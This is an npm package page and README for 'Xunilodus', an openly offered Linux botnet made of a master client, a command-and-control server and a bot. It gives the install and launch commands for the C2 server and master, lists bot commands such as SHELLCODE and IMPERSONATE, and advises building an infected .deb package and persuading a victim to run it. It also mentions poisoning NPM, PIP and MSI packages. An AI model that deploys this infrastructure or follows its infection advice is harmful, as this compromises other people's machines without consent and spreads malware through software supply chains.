xunilodus-master

This command line tool is used to connect with an remote Xunilodus Command Control botnet server.

Usage no npm install needed!

<script type="module">
  import xunilodusMaster from 'https://cdn.skypack.dev/xunilodus-master';
</script>

README

Xunilodus Botnet

The open-source project of a botnet master, command control and bot with linux system's as target.

Known targets:

  • Debian;
  • Ubuntu;
  • Linux Mint/Cinnamon;
  • PopOS;
  • And some others!

1. How it works?

Xunilodus is a botnet designed on the Python, Node.js and Shell Script language to work on systems with kernel derived from linux.

Its form of communication is based on a protocol superior to the WebSocket called SFXTP (Single Frame Xunilodus Transmission Protocol). This protocol allows communications between the Master, the Command Center and the Bot. For reasons of limitation, each frame (data packet) is restricted to 65535 bytes (~64kb).

Each command sent by the master to the bot is tunneled by the command center that directs which bot to send the information through an open socket.

All traffic data between a Master and a Bot is tunneled by Command Control.

Botnet Scheme

2. SFXTP (Single Frame Xunilodus Transmission Protocol)

SFXTP

3. Command Control - List of supported commands

  • HELP
  • IMPERSONATE
  • DEPERSONATE
  • LISTBOTS
  • SHELLCODE

4. Installation

Installation Image Installation Image 

npm install -g xunilodus-server
npm install -g xunilodus-master

You need first install the Xunilodus Master Client CLI and the Xunilodus Server Command Control. Run the commands above to do that.

4.1 Techniques to exploit the target

Also, to gain control over your target, you must exploit some vulnerability of the target linux system and then make it run your exploit in python. Remember to change the address of your own command and control server.

It is out of the question to explain how to accomplish this in this project, but what you can do is create an infected .deb package and persuade your victim to run it. There are also other techniques such as infecting NPM, PIP, DEB, MSI packages in Windows, among others.

5. Setting up a Xunilodus Botnet Server

You will need a WebServer with at least 1GB of RAM and open one port in your firewall (the default port for Xunilodus is 44335).

After change the rules of your firewall and install the Xunilodus Server CLI, run the command with your port:

xunilodus-server --port=44335

6. Connecting to Xunilodus Server in a Master Client

Run the following command to connect to a Xunilodus server instance:

xunilodus-master --address=127.0.0.1 --port=44335 --ws

Change the address to your external ip address or local address. If you are running over a proxy like cloudflare with HTTPS or something like, provide the correct port (443 for default HTTPS) and change the protocol to --wss (Web Socket Secure).

xunilodus-master --address=my.domain.com --port=443 --wss